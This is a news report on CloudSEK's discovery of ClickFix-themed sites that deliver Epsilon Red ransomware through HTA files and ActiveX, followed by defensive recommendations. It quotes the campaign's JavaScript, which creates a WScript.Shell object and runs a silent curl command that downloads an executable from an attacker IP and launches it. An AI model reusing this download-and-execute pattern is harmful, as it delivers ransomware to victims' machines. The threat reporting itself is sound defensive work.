Security researchers at CloudSEK have uncovered a sophisticated malware delivery campaign using Clickfix-themed websites to distribute Epsilon Red ransomware, marking a dangerous evolution in social engineering tactics.
The campaign leverages malicious.HTA files and ActiveX objects can silently execute shell commands, bypassing traditional security measures while impersonating popular online services to deceive victims.
Advanced Execution Method Exploits Browser Vulnerabilities
Unlike conventional Clickfix campaigns that copy malicious commands to clipboards, this variant employs a more direct approach by urging victims to visit a secondary page where JavaScript code creates an ActiveXObject to execute Windows shell commands.
The malicious script runs var shell = new ActiveXObject("WScript.Shell"); to establish command-line access, then silently downloads and executes the ransomware payload using the command: shell.Run("cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe && a.exe", 0);.
The attack concludes with a sophisticated social engineering element, displaying a fake verification message that reads “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” – a deliberately misspelled prompt designed to appear non-threatening while maintaining the illusion of legitimate verification.
The intentional typo in “Verificatification” serves to lower suspicion of victimization by appearing amateurish rather than malicious.
Widespread Infrastructure Targeting Popular Platforms
CloudSEK’s investigation revealed that threat actors are operating an extensive infrastructure network, impersonating widely used services, including Discord Captcha Bot, Kick, Twitch, Rumble, and OnlyFans, to maximize their reach.
The researchers also discovered romance-themed and dating-focused Clickfix delivery pages operated by the same cybercriminal group, indicating a diversified approach to victim targeting.
Epsilon Red ransomware, first identified in 2021, bears stylistic similarities to the notorious REvil ransomware in its ransom note formatting.
However, security experts note that beyond aesthetic resemblance, the two ransomware families appear operationally distinct.
The malware sample (MD5: 98107c01ecd8b7802582d404e007e493) demonstrates the group’s continued evolution and adaptation of their attack methods.
The campaign’s impact extends beyond individual infections, as the abuse of ActiveXObject enables remote code execution directly from browser sessions, effectively bypassing traditional download protections.
Security experts recommend disabling ActiveX and Windows Script Host through Group Policy, implementing threat intelligence feeds to block known malicious IP addresses, and deploying endpoint detection rules to identify suspicious browser-spawned processes.
